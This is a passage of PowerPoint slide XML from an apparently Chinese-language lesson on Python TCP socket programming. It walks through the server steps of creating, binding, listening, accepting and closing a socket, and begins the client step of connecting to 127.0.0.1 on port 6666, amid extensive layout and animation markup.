                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>使用TCP套接字编程可以实现基于TCP/IP协议的面向连接的通信，它分为服务器端和客户端两部分</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="矩形 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6843957" y="4188086"/>
              <a:ext cx="1695861" cy="356541"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>TCP</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>层通信</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="直接连接符 14"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3137133" y="2095065"/>
            <a:ext cx="417211" cy="1495661"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="15875">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="100000">
                  <a:schemeClr val="bg1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="0">
                  <a:schemeClr val="bg1"/>
                </a:gs>
              </a:gsLst>
              <a:path path="circle">
                <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
              </a:path>
              <a:tileRect/>
            </a:gradFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="127000" dist="63500" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="27000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>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1397996" y="2215911"/>
            <a:ext cx="1259763" cy="1259763"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="50000">
                <a:schemeClr val="bg1">
                  <a:alpha val="80000"/>
                  <a:lumMod val="95000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="100000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="BFBFBF">
                  <a:alpha val="70000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:path path="circle">
              <a:fillToRect t="100000" r="100000"/>
            </a:path>
            <a:tileRect l="-100000" b="-100000"/>
          </a:gradFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="571500" dist="5080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p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst>
                  <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                    <a:prstClr val="black">
                      <a:alpha val="30000"/>
                    </a:prstClr>
                  </a:innerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="6600" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst>
                <a:innerShdw blurRad="63500" dist="50800" dir="16200000">
                  <a:prstClr val="black">
                    <a:alpha val="30000"/>
                  </a:prstClr>
                </a:innerShdw>
              </a:effectLst>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition p14:dur="9"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25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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="26"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="125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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="32"/>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63" presetClass="path" presetSubtype="0" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02774 1.11111E-6 L 0.1108 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6927" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="16" presetID="35" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 1.11111E-6 L 4.16667E-6 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="1393" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="18" presetID="16" presetClass="entr" presetSubtype="42" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="21" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="125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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="24" presetID="22" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="125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750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="9"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="27" presetID="16" presetClass="entr" presetSubtype="42" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1000"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(outHorizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="750"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>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63" presetClass="path" presetSubtype="0" decel="50000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="500"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.02774 1.11111E-6 L 0.1108 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6927" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="35" presetID="35" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="1250"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -0.028 1.11111E-6 L 4.16667E-6 1.11111E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="16"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="139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bldLvl="0" animBg="1"/>
      <p:bldP spid="2" grpId="2" bldLvl="0" animBg="1"/>
      <p:bldP spid="16" grpId="0" bldLvl="0" animBg="1"/>
      <p:bldP spid="16" grpId="1" bldLvl="0" animBg="1"/>
      <p:bldP spid="16" grpId="2"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406515" y="391795"/>
            <a:ext cx="5448935" cy="6004560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.创建socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s = socket(AF_INET, SOCK_STREAM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AF_INET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>说明使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SOCK_STREAM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>指明为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>协议</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>和地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址和端口）绑定</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.bind(('',6666))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、监听，等待连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>s.listen(1)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>最大连接数是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、开始通讯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sock,addr = s.accept()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>socket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，和客户端地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>无请求将会堵塞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>accept()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>返回的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sock</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sock.close()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="220980" y="970915"/>
            <a:ext cx="6066790" cy="5323840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="652769" y="391945"/>
            <a:ext cx="2595152" cy="579120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" sz="3200" b="1" dirty="0" smtClean="0">
                <a:blipFill>
                  <a:blip r:embed="rId2"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </a:blipFill>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>服务端</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="3200" b="1" dirty="0">
              <a:blipFill>
                <a:blip r:embed="rId2"/>
                <a:stretch>
                  <a:fillRect/>
                </a:stretch>
              </a:blipFill>
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" Requires="p14">
      <p:transition p14:dur="9"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childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="10" presetID="35" presetClass="path" presetSubtype="0" decel="40000" fill="hold" grpId="1" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01029 2.22222E-6 L -0.09674 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="750" spd="-100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-5352" y="0"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="12" presetID="35" presetClass="path" presetSubtype="0" accel="40000" decel="40000" fill="hold" grpId="2" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="750"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.01094 2.22222E-6 L -2.5E-6 2.22222E-6 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="750" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-54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6" grpId="0"/>
      <p:bldP spid="36" grpId="1"/>
      <p:bldP spid="36" grpId="2"/>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447790" y="959485"/>
            <a:ext cx="5379720" cy="4907280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1.创建socket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c = socket(AF_INET,SOCK_STREAM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接目标</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>c.connect(('127.0.0.1',6666))</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
